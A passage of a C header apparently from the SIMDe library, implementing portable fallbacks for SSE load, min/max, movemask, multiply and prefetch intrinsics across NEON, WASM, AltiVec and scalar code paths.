simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vld1q_dup_f32(mem_addr);
#else
r_ = simde__m128_to_private(simde_mm_set1_ps(*mem_addr));
#endif
return simde__m128_from_private(r_);
#endif
}
#define simde_mm_load_ps1(mem_addr) simde_mm_load1_ps(mem_addr)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ps1(mem_addr) simde_mm_load1_ps(mem_addr)
#define _mm_load1_ps(mem_addr) simde_mm_load1_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_load_ss(simde_float32 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ss(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(*mem_addr, vdupq_n_f32(0), 0);
#else
r_.f32[0] = *mem_addr;
r_.i32[1] = 0;
r_.i32[2] = 0;
r_.i32[3] = 0;
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ss(mem_addr) simde_mm_load_ss(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_loadh_pi(simde__m128 a, simde__m64 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_loadh_pi(a,
HEDLEY_REINTERPRET_CAST(__m64 const *, mem_addr));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(
vget_low_f32(a_.neon_f32),
vld1_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr)));
#else
simde__m64_private b_ =
*HEDLEY_REINTERPRET_CAST(simde__m64_private const *, mem_addr);
r_.f32[0] = a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = b_.f32[0];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#if HEDLEY_HAS_WARNING("-Wold-style-cast")
#define _mm_loadh_pi(a, mem_addr) \
simde_mm_loadh_pi((a), HEDLEY_REINTERPRET_CAST(simde__m64 const *, \
(mem_addr)))
#else
#define _mm_loadh_pi(a, mem_addr) \
simde_mm_loadh_pi((a), (simde__m64 const *)(mem_addr))
#endif
#endif
/* The SSE documentation says that there are no alignment requirements
for mem_addr. Unfortunately they used the __m64 type for the argument
which is supposed to be 8-byte aligned, so some compilers (like clang
with -Wcast-align) will generate a warning if you try to cast, say,
a simde_float32* to a simde__m64* for this function.
I think the choice of argument type is unfortunate, but I do think we
need to stick to it here. If there is demand I can always add something
like simde_x_mm_loadl_f32(simde__m128, simde_float32 mem_addr[2]) */
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_loadl_pi(simde__m128 a, simde__m64 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadl_pi(a,
HEDLEY_REINTERPRET_CAST(__m64 const *, mem_addr));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(
vld1_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr)),
vget_high_f32(a_.neon_f32));
#else
simde__m64_private b_;
simde_memcpy(&b_, mem_addr, sizeof(b_));
r_.i32[0] = b_.i32[0];
r_.i32[1] = b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#if HEDLEY_HAS_WARNING("-Wold-style-cast")
#define _mm_loadl_pi(a, mem_addr) \
simde_mm_loadl_pi((a), HEDLEY_REINTERPRET_CAST(simde__m64 const *, \
(mem_addr)))
#else
#define _mm_loadl_pi(a, mem_addr) \
simde_mm_loadl_pi((a), (simde__m64 const *)(mem_addr))
#endif
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_loadr_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadr_ps(mem_addr);
#else
simde__m128_private r_,
v_ = simde__m128_to_private(simde_mm_load_ps(mem_addr));
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vrev64q_f32(v_.neon_f32);
r_.neon_f32 = vextq_f32(r_.neon_f32, r_.neon_f32, 2);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE) && defined(__PPC64__)
r_.altivec_f32 = vec_reve(v_.altivec_f32);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, v_.f32, v_.f32, 3, 2, 1, 0);
#else
r_.f32[0] = v_.f32[3];
r_.f32[1] = v_.f32[2];
r_.f32[2] = v_.f32[1];
r_.f32[3] = v_.f32[0];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_loadr_ps(mem_addr) simde_mm_loadr_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_loadu_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadu_ps(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vld1q_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_load(mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE) && defined(__PPC64__)
r_.altivec_f32 = vec_vsx_ld(0, mem_addr);
#else
simde_memcpy(&r_, mem_addr, sizeof(r_));
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_loadu_ps(mem_addr) simde_mm_loadu_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_maskmove_si64(simde__m64 a, simde__m64 mask, int8_t *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
_mm_maskmove_si64(a, mask, HEDLEY_REINTERPRET_CAST(char *, mem_addr));
#else
simde__m64_private a_ = simde__m64_to_private(a),
mask_ = simde__m64_to_private(mask);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(a_.i8) / sizeof(a_.i8[0])); i++)
if (mask_.i8[i] < 0)
mem_addr[i] = a_.i8[i];
#endif
}
#define simde_m_maskmovq(a, mask, mem_addr) \
simde_mm_maskmove_si64(a, mask, mem_addr)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_maskmove_si64(a, mask, mem_addr) \
simde_mm_maskmove_si64( \
(a), (mask), \
SIMDE_CHECKED_REINTERPRET_CAST(int8_t *, char *, (mem_addr)))
#define _m_maskmovq(a, mask, mem_addr) \
simde_mm_maskmove_si64( \
(a), (mask), \
SIMDE_CHECKED_REINTERPRET_CAST(int8_t *, char *, (mem_addr)))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_max_pi16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_max_pi16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i16 = vmax_s16(a_.neon_i16, b_.neon_i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = (a_.i16[i] > b_.i16[i]) ? a_.i16[i] : b_.i16[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmaxsw(a, b) simde_mm_max_pi16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_pi16(a, b) simde_mm_max_pi16(a, b)
#define _m_pmaxsw(a, b) simde_mm_max_pi16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_max_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_max_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_NANS)
r_.neon_f32 = vmaxq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vbslq_f32(vcgtq_f32(a_.neon_f32, b_.neon_f32),
a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE) && defined(SIMDE_FAST_NANS)
r_.wasm_v128 = wasm_f32x4_max(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 =
wasm_v128_bitselect(a_.wasm_v128, b_.wasm_v128,
wasm_f32x4_gt(a_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) && defined(SIMDE_FAST_NANS)
r_.altivec_f32 = vec_max(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_sel(b_.altivec_f32, a_.altivec_f32,
vec_cmpgt(a_.altivec_f32, b_.altivec_f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (a_.f32[i] > b_.f32[i]) ? a_.f32[i] : b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_ps(a, b) simde_mm_max_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_max_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_max_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vmax_u8(a_.neon_u8, b_.neon_u8);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] > b_.u8[i]) ? a_.u8[i] : b_.u8[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmaxub(a, b) simde_mm_max_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_pu8(a, b) simde_mm_max_pu8(a, b)
#define _m_pmaxub(a, b) simde_mm_max_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_max_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_max_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_max_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value = vgetq_lane_f32(maxq_f32(a_.neon_f32, b_.neon_f32), 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = (a_.f32[0] > b_.f32[0]) ? a_.f32[0] : b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_ss(a, b) simde_mm_max_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_min_pi16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_min_pi16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i16 = vmin_s16(a_.neon_i16, b_.neon_i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = (a_.i16[i] < b_.i16[i]) ? a_.i16[i] : b_.i16[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pminsw(a, b) simde_mm_min_pi16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_pi16(a, b) simde_mm_min_pi16(a, b)
#define _m_pminsw(a, b) simde_mm_min_pi16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_min_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_min_ps(a, b);
#elif defined(SIMDE_FAST_NANS) && defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return simde__m128_from_neon_f32(vminq_f32(simde__m128_to_neon_f32(a),
simde__m128_to_neon_f32(b)));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_FAST_NANS)
r_.wasm_v128 = wasm_f32x4_min(a_.wasm_v128, b_.wasm_v128);
#else
r_.wasm_v128 =
wasm_v128_bitselect(a_.wasm_v128, b_.wasm_v128,
wasm_f32x4_lt(a_.wasm_v128, b_.wasm_v128));
#endif
return simde__m128_from_private(r_);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_FAST_NANS)
r_.altivec_f32 = vec_min(a_.altivec_f32, b_.altivec_f32);
#else
r_.altivec_f32 = vec_sel(b_.altivec_f32, a_.altivec_f32,
vec_cmpgt(b_.altivec_f32, a_.altivec_f32));
#endif
return simde__m128_from_private(r_);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
simde__m128 mask = simde_mm_cmplt_ps(a, b);
return simde_mm_or_ps(simde_mm_and_ps(mask, a),
simde_mm_andnot_ps(mask, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (a_.f32[i] < b_.f32[i]) ? a_.f32[i] : b_.f32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_ps(a, b) simde_mm_min_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_min_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_min_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vmin_u8(a_.neon_u8, b_.neon_u8);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] < b_.u8[i]) ? a_.u8[i] : b_.u8[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pminub(a, b) simde_mm_min_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_pu8(a, b) simde_mm_min_pu8(a, b)
#define _m_pminub(a, b) simde_mm_min_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_min_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_min_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_min_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value =
vgetq_lane_f32(vminq_f32(a_.neon_f32, b_.neon_f32), 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = (a_.f32[0] < b_.f32[0]) ? a_.f32[0] : b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_ss(a, b) simde_mm_min_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_movehl_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_movehl_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a32 = vget_high_f32(a_.neon_f32);
float32x2_t b32 = vget_high_f32(b_.neon_f32);
r_.neon_f32 = vcombine_f32(b32, a32);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_mergel(b_.altivec_i64, a_.altivec_i64));
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 6, 7, 2, 3);
#else
r_.f32[0] = b_.f32[2];
r_.f32[1] = b_.f32[3];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movehl_ps(a, b) simde_mm_movehl_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_movelh_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_movelh_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a10 = vget_low_f32(a_.neon_f32);
float32x2_t b10 = vget_low_f32(b_.neon_f32);
r_.neon_f32 = vcombine_f32(a10, b10);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 0, 1, 4, 5);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_mergeh(a_.altivec_i64, b_.altivec_i64));
#else
r_.f32[0] = a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = b_.f32[0];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movelh_ps(a, b) simde_mm_movelh_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_movemask_pi8(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_movemask_pi8(a);
#else
simde__m64_private a_ = simde__m64_to_private(a);
int r = 0;
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
uint8x8_t input = a_.neon_u8;
const int8_t xr[8] = {-7, -6, -5, -4, -3, -2, -1, 0};
const uint8x8_t mask_and = vdup_n_u8(0x80);
const int8x8_t mask_shift = vld1_s8(xr);
const uint8x8_t mask_result =
vshl_u8(vand_u8(input, mask_and), mask_shift);
uint8x8_t lo = mask_result;
r = vaddv_u8(lo);
#else
const size_t nmemb = sizeof(a_.i8) / sizeof(a_.i8[0]);
SIMDE_VECTORIZE_REDUCTION(| : r)
for (size_t i = 0; i < nmemb; i++) {
r |= (a_.u8[nmemb - 1 - i] >> 7) << (nmemb - 1 - i);
}
#endif
return r;
#endif
}
#define simde_m_pmovmskb(a) simde_mm_movemask_pi8(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movemask_pi8(a) simde_mm_movemask_pi8(a)
#define _m_pmovmskb(a) simde_mm_movemask_pi8(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_movemask_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_movemask_ps(a);
#else
int r = 0;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
static const int32_t shift_amount[] = {0, 1, 2, 3};
const int32x4_t shift = vld1q_s32(shift_amount);
uint32x4_t tmp = vshrq_n_u32(a_.neon_u32, 31);
return HEDLEY_STATIC_CAST(int, vaddvq_u32(vshlq_u32(tmp, shift)));
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
// Shift out everything but the sign bits with a 32-bit unsigned shift right.
uint64x2_t high_bits =
vreinterpretq_u64_u32(vshrq_n_u32(a_.neon_u32, 31));
// Merge the two pairs together with a 64-bit unsigned shift right + add.
uint8x16_t paired =
vreinterpretq_u8_u64(vsraq_n_u64(high_bits, high_bits, 31));
// Extract the result.
return vgetq_lane_u8(paired, 0) | (vgetq_lane_u8(paired, 8) << 2);
#else
SIMDE_VECTORIZE_REDUCTION(| : r)
for (size_t i = 0; i < sizeof(a_.u32) / sizeof(a_.u32[0]); i++) {
r |= (a_.u32[i] >> ((sizeof(a_.u32[i]) * CHAR_BIT) - 1)) << i;
}
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movemask_ps(a) simde_mm_movemask_ps((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_mul_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_mul_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vmulq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_mul(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 * b_.f32;
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_mul(a_.altivec_f32, b_.altivec_f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] * b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mul_ps(a, b) simde_mm_mul_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_mul_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_mul_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_mul_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[0] * b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mul_ss(a, b) simde_mm_mul_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_mulhi_pu16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_mulhi_pu16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
const uint32x4_t t1 = vmull_u16(a_.neon_u16, b_.neon_u16);
const uint32x4_t t2 = vshrq_n_u32(t1, 16);
const uint16x4_t t3 = vmovn_u32(t2);
r_.neon_u16 = t3;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u16) / sizeof(r_.u16[0])); i++) {
r_.u16[i] = HEDLEY_STATIC_CAST(
uint16_t, ((HEDLEY_STATIC_CAST(uint32_t, a_.u16[i]) *
HEDLEY_STATIC_CAST(uint32_t, b_.u16[i])) >>
UINT32_C(16)));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmulhuw(a, b) simde_mm_mulhi_pu16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mulhi_pu16(a, b) simde_mm_mulhi_pu16(a, b)
#define _m_pmulhuw(a, b) simde_mm_mulhi_pu16(a, b)
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && defined(HEDLEY_GCC_VERSION)
#define SIMDE_MM_HINT_NTA HEDLEY_STATIC_CAST(enum _mm_hint, 0)
#define SIMDE_MM_HINT_T0 HEDLEY_STATIC_CAST(enum _mm_hint, 1)
#define SIMDE_MM_HINT_T1 HEDLEY_STATIC_CAST(enum _mm_hint, 2)
#define SIMDE_MM_HINT_T2 HEDLEY_STATIC_CAST(enum _mm_hint, 3)
#define SIMDE_MM_HINT_ENTA HEDLEY_STATIC_CAST(enum _mm_hint, 4)
#define SIMDE_MM_HINT_ET0 HEDLEY_STATIC_CAST(enum _mm_hint, 5)
#define SIMDE_MM_HINT_ET1 HEDLEY_STATIC_CAST(enum _mm_hint, 6)
#define SIMDE_MM_HINT_ET2 HEDLEY_STATIC_CAST(enum _mm_hint, 7)
#else
#define SIMDE_MM_HINT_NTA 0
#define SIMDE_MM_HINT_T0 1
#define SIMDE_MM_HINT_T1 2
#define SIMDE_MM_HINT_T2 3
#define SIMDE_MM_HINT_ENTA 4
#define SIMDE_MM_HINT_ET0 5
#define SIMDE_MM_HINT_ET1 6
#define SIMDE_MM_HINT_ET2 7
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
HEDLEY_DIAGNOSTIC_PUSH
#if HEDLEY_HAS_WARNING("-Wreserved-id-macro")
_Pragma("clang diagnostic ignored \"-Wreserved-id-macro\"")
#endif
#undef _MM_HINT_NTA
#define _MM_HINT_NTA SIMDE_MM_HINT_NTA
#undef _MM_HINT_T0
#define _MM_HINT_T0 SIMDE_MM_HINT_T0
#undef _MM_HINT_T1
#define _MM_HINT_T1 SIMDE_MM_HINT_T1
#undef _MM_HINT_T2
#define _MM_HINT_T2 SIMDE_MM_HINT_T2
#undef _MM_HINT_ETNA
#define _MM_HINT_ETNA SIMDE_MM_HINT_ETNA
#undef _MM_HINT_ET0
#define _MM_HINT_ET0 SIMDE_MM_HINT_ET0
#undef _MM_HINT_ET1
#define _MM_HINT_ET1 SIMDE_MM_HINT_ET1
#undef _MM_HINT_ET1
#define _MM_HINT_ET2 SIMDE_MM_HINT_ET2
HEDLEY_DIAGNOSTIC_POP
#endif
SIMDE_FUNCTION_ATTRIBUTES void simde_mm_prefetch(char const *p, int i)
{
#if defined(HEDLEY_GCC_VERSION)
__builtin_prefetch(p);
#else
(void)p;
#endif
(void)i;
}
#if defined(SIMDE_X86_SSE_NATIVE)
#if defined(__clang__) && \
!SIMDE_DETECT_CLANG_VERSION_CHECK( \
10, 0, 0) /* https://reviews.llvm.org/D71718 */
#define simde_mm_prefetch(p, i) \
(__extension__({ \
HEDLEY_DIAGNOSTIC_PUSH \
HEDLEY_DIAGNOSTIC_DISABLE_CAST_QUAL \
_mm_prefetch((p), (i)); \
HEDLEY_DIAGNOSTIC_POP \
}))
#else
#define simde_mm_prefetch(p, i) _mm_prefetch(p, i)
#endif
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_prefetch(p, i) simde_mm_prefetch(p, i)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_negate_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return simde_mm_xor_ps(a, _mm_set1_ps(SIMDE_FLOAT32_C(-0.0)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_POWER_ALTIVEC_P8_NATIVE) && \
(!defined(HEDLEY_GCC_VERSION) || HEDLEY_GCC_VERSION_CHECK(8, 1, 0))
